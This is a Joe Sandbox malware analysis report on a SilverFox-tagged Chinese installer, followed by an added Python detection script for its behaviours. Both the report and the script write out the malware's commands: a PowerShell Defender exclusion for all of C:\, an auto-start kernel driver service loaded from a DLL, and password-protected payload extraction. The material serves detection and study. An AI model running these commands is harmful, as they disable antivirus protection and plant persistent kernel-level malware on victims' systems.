Windows Analysis Report
#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe

Overview

General Information

Sample name: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe (Joe Sandbox escapes non-ASCII filename characters as #Uxxxx; the four escaped characters are 安装程序, Chinese for "installer")
Renamed by the sandbox; the report's note reads "renamed because original name is a hash value", although the visible original name is not a hash but the non-ASCII name above
Original sample name: 安装程序_1.1.6.exe (shown as "_1.1.6.exe" in the extracted text, the Chinese characters having been dropped)
Analysis ID: 1580553
MD5: 1892cf920ffe70868b967804d9222b14
SHA1: 2b2a0a6bbd472bf5aee0fb476d4ddd07f0c234dd
SHA256: 459794c80f6ede491eefd8c6eabf5abe8cbd29a4d224e35072b38af2610f07d0
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification (chart not reproduced in this text extraction)

Process Tree

  • System is w10x64
  • #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe (PID: 6204 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" MD5: 1892CF920FFE70868B967804D9222B14)
    • #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp (PID: 6416 cmdline: "C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$10424,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" MD5: F71908CEAB1076D5D4250CBFCB02E6B2)
      • powershell.exe (PID: 6556 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 932 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT MD5: 1892CF920FFE70868B967804D9222B14)
        • #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp (PID: 4284 cmdline: "C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$302A2,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT MD5: F71908CEAB1076D5D4250CBFCB02E6B2)
          • 7zr.exe (PID: 1136 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 1396 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6476 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3336 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3688 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6480 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5868 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6048 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5924 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3052 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6476 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3524 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5840 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6380 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2504 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3568 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6400 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6204 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5304 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6396 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5868 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2852 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6380 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3568 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3052 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6416 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4820 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5548 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2028 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4416 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6048 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2088 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2424 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5304 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5544 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5548 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6364 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1436 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4364 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3052 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2424 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6440 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5544 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4956 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5216 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3220 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2020 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2564 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3180 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5304 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3620 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6016 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6612 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3448 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3368 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4584 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2564 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$10424,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, ParentProcessId: 6416, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6556, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6476, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3336, ProcessName: sc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$10424,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, ParentProcessId: 6416, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6556, ProcessName: powershell.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6476, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3336, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$10424,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, ParentProcessId: 6416, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6556, ProcessName: powershell.exe
No Suricata rule has matched
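The process tree and the Sigma matches above give an analyst four command-line patterns worth detecting on their own telemetry: a Defender exclusion for an entire drive root, a kernel-mode service created with sc.exe whose image is a .dll outside System32\drivers, that service being started over and over, and 7zr.exe unpacking .dat files with the password on the command line (which also hands the analyst the passwords, ad8dtyw9eyfd9aslyd9iald and asfasdf79yf9layslofs, needed to open res.dat and locale3.dat from the installer). The Python below is an added example, not part of the Joe Sandbox report or of the Sigma rules it cites: the event records are constructed to mirror the report's command lines, the field names follow Sysmon process-creation events, and the rule names, severities and the retry threshold are this example's own assumptions. It goes slightly beyond the report by decoding -EncodedCommand payloads before matching, the evasion the "Base64 Encoded MpPreference Cmdlet" rule exists for.

```python
"""Process-creation detection logic for the behaviours in this report.

Added example, not part of the Joe Sandbox report or of the Sigma rules it cites.
Event records are constructed to mirror the report's command lines; field names
follow Sysmon Event ID 1. Rule names, severities and START_RETRY_THRESHOLD are
this example's own assumptions.
"""
from __future__ import annotations

import base64
import re
from collections import Counter
from dataclasses import dataclass

START_RETRY_THRESHOLD = 3  # assumption: this many `sc start` of one service is a retry loop
ARCHIVE_EXTENSIONS = {"7z", "zip", "rar", "tar", "gz", "xz", "cab"}


@dataclass(frozen=True)
class ProcEvent:
    image: str          # Sysmon "Image": full path of the new process
    command_line: str   # Sysmon "CommandLine"


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    detail: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _with_decoded_command(cmd: str) -> str:
    """Append the plaintext of an -EncodedCommand payload (base64 of UTF-16LE) so the same
    regexes match encoded and plain invocations; PowerShell accepts any unambiguous prefix
    of -EncodedCommand (-e, -ec, -enc, ...)."""
    m = re.search(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", cmd, re.I)
    if m and "encodedcommand".startswith(m.group(1).lower()):
        try:
            return cmd + " " + base64.b64decode(m.group(2)).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            pass
    return cmd


def rule_defender_exclusion(ev: ProcEvent) -> Finding | None:
    if _basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return None
    cmd = _with_decoded_command(ev.command_line)
    m = re.search(r"(Add|Set)-MpPreference\b.*?-Exclusion(Path|Extension|Process)\s+['\"]?([^'\"\s]+)",
                  cmd, re.I)
    if not m:
        return None
    target = m.group(3)
    drive_root = re.fullmatch(r"[A-Za-z]:\\?", target) is not None  # 'C:\' disables scanning wholesale
    return Finding("defender_exclusion_added", "critical" if drive_root else "high",
                   f"{m.group(1)}-MpPreference -Exclusion{m.group(2)} {target}")


def rule_kernel_driver_service(ev: ProcEvent) -> Finding | None:
    if _basename(ev.image) != "sc.exe":
        return None
    cmd = ev.command_line
    name = re.search(r"\bcreate\s+(\S+)", cmd, re.I)
    if not name or not re.search(r"type=\s*kernel\b", cmd, re.I):
        return None
    m = re.search(r"binpath=\s*(?:\"([^\"]+)\"|(\S+))", cmd, re.I)
    binpath = (m.group(1) or m.group(2)) if m else "?"
    oddities = []
    if not binpath.lower().endswith(".sys"):
        oddities.append("driver image is not a .sys file")
    if "\\system32\\drivers\\" not in binpath.lower():
        oddities.append("driver image outside System32\\drivers")
    if re.search(r"start=\s*auto\b", cmd, re.I):
        oddities.append("auto-start persistence")
    return Finding("kernel_driver_service_created", "critical" if oddities else "medium",
                   f"{name.group(1)} -> {binpath}; " + "; ".join(oddities))


def rule_password_archive_extract(ev: ProcEvent) -> Finding | None:
    if _basename(ev.image) not in ("7z.exe", "7za.exe", "7zr.exe"):
        return None
    tokens = ev.command_line.split()
    if len(tokens) < 3 or tokens[1].lower() not in ("x", "e"):
        return None
    password = next((t[2:] for t in tokens[2:] if t.startswith("-p") and len(t) > 2), None)
    if password is None:
        return None
    archive = next((t for t in tokens[2:] if not t.startswith("-")), "?")
    ext = archive.rsplit(".", 1)[-1].lower() if "." in archive else ""
    severity = "high" if ext not in ARCHIVE_EXTENSIONS else "low"  # .dat hiding a 7z archive
    return Finding("password_archive_extract", severity,
                   f"{archive} extracted with inline password {password!r}")


def rule_service_start_burst(events: list[ProcEvent]) -> list[Finding]:
    """Corpus-level rule: the same service started repeatedly (the report shows ~30 attempts)."""
    starts: Counter[str] = Counter()
    for ev in events:
        if _basename(ev.image) == "sc.exe":
            m = re.fullmatch(r"\s*sc(?:\.exe)?\s+start\s+(\S+)\s*", ev.command_line, re.I)
            if m:
                starts[m.group(1)] += 1
    return [Finding("service_start_burst", "medium", f"sc start {svc} seen {n} times")
            for svc, n in starts.items() if n >= START_RETRY_THRESHOLD]


def run_rules(events: list[ProcEvent]) -> list[Finding]:
    findings = []
    for ev in events:
        for rule in (rule_defender_exclusion, rule_kernel_driver_service, rule_password_archive_extract):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    findings.extend(rule_service_start_burst(events))
    return findings


# Constructed sample events mirroring the report's process tree, plus two benign controls.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_SC = r"C:\Windows\System32\sc.exe"
_7ZR = r"C:\Program Files (x86)\Windows NT\7zr.exe"
_ENCODED = base64.b64encode("Add-MpPreference -ExclusionPath 'C:\\'".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ProcEvent(_PS, "\"powershell.exe\" -Command \"Add-MpPreference -ExclusionPath 'C:\\'\""),
    ProcEvent(_PS, f"powershell.exe -nop -w hidden -enc {_ENCODED}"),   # encoded variant
    ProcEvent(_PS, "powershell.exe -Command Get-MpPreference"),          # benign control
    ProcEvent(_7ZR, "7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald"),
    ProcEvent(_7ZR, "7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs"),
    ProcEvent(_SC, 'sc create CleverSoar displayname= CleverSoar binPath= '
                   '"C:\\Program Files (x86)\\Windows NT\\tProtect.dll" type= kernel start= auto'),
    ProcEvent(_SC, "sc query wuauserv"),                                 # benign control
] + [ProcEvent(_SC, "sc start CleverSoar")] * 4

if __name__ == "__main__":
    for f in run_rules(SAMPLE_EVENTS):
        print(f"[{f.severity:8}] {f.rule}: {f.detail}")
```

In production these checks belong in Sigma rules over the same process_creation log source; the service-start burst is the one that needs a time window and a per-host key, which the corpus-level function above leaves out. The recovered 7-Zip passwords are worth recording as indicators in their own right, since the same packing step tends to survive across builds of an installer.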


AV Detection

